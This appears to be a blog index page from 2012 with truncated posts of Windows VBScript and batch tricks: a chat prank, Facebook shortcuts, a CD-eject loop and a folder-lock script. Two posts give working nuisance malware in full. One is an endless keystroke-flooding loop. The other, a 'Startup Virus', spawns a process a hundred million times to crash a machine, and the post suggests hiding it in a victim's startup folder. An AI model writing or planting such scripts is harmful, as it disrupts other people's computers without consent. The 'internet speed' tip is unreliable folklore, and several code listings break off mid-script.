Hi friends,
The below code will make your PC chat with you.To do this, just copy the below code and paste it in
notepad and save it as anyname.vbs
dim fname
fname=inputbox("Type the text here.","Let's Chat")
fname=inputbox("Type the text here.","Let's Chat")
fname=inputbox("Type the text here.","Let's Chat")
fname=inputbox("Type the text here.","Let's Chat")
Enjoy...
Thursday, September 27, 2012
Facebook shortcut keys !

Facebook
is the most popular social network now. Millions of users use it. I hope
all of bloggers use facebook. Do you know, there are more shortcut keys
for Facebook, You can open new massage,search shortcut,home page
shortcut and more. So, It helps to do some important works without
moving courser. Shortcuts are sometime different from internet
browser. So,i will include all for you.
New message
Chrome: ALT + M
Firefox:...
Don't try it on your computer !

Hi friends,
Here is the code by which your system can get affected.But be careful, after doing this you will need to either end some processes or restart your computer. To do it, just copy the below code and paste it in notepad and save it as anyname.vbs
Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys("Your message")
wshshell.sendkeys("Your message")
wshshell.sendkeys("Your message")
loop
Enjoy...
Increase internet speed upto maximum available !

Hi friends,
Do you want to increase your internet speed upto maximum available? If you want to do that, then follow these steps,
Step1 : Right Click on my Computer
Step2 : Selects the Properties Tag
Step3 : Now a New Window opens, Select The Hardware and Then Select Device Manager.
Step4 : Now a New Window will open . Click on the + sign in front of Ports and select the Communication Ports and Double Click on It.
Step5: A new...
Monday, September 24, 2012
Check effectiveness of your Antivirus

Have you ever wondered that is your Antivirus working properly? Do you want to ensure that your antivirus works properly? So don't worry we have got a perfect working solution which will make you to Check Effectiveness of your Antivirus.The test for this purpose is called EICAR Test. This test is used by many antivirus developers to find whether there antivirus is working properly or not.Here is a...
Monday, September 3, 2012
Startup Virus
Hi Friends,
Just copy this to notepad and save it as anyname.vbs and one new file will be created, by opening that file, it will only crash your computer but u can put it in the startup folder of the victims computer:
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
Enjoy...
CD drive eject & load automatically
Hi friends,
Today I will show you a magic that you can see yourself. Just copy the below code,
paste it in notepad and save it as anyname.vbs. After doing so, one new file will
be created and by opening that new file your CD drive will eject and load
Automatically! It will not stop automatically.
To stop it-
1. Open task manager
2. Go to 'Process' tab
3. End the process of wscript.exe
and the code is-
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i...
Online TV website
Hi friends,
You can now watch online TV and you will not need any software (that I think so). To do this you have to go to www.newtvworld.com.
Enjoy...
Saturday, September 1, 2012
Lock a folder without software !
1- Make a new folder ( name it as you like )
2- Inside this folder make a ( TXT ) file & copy inside it this (the entire thing) that is written below.
Quote:
Quote: cls
@ECHO OFF
title Folder Private
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Private goto MDLOCKER
:CONFIRM
echo Are you sure you want to lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Private...
Subscribe to:
Posts (Atom)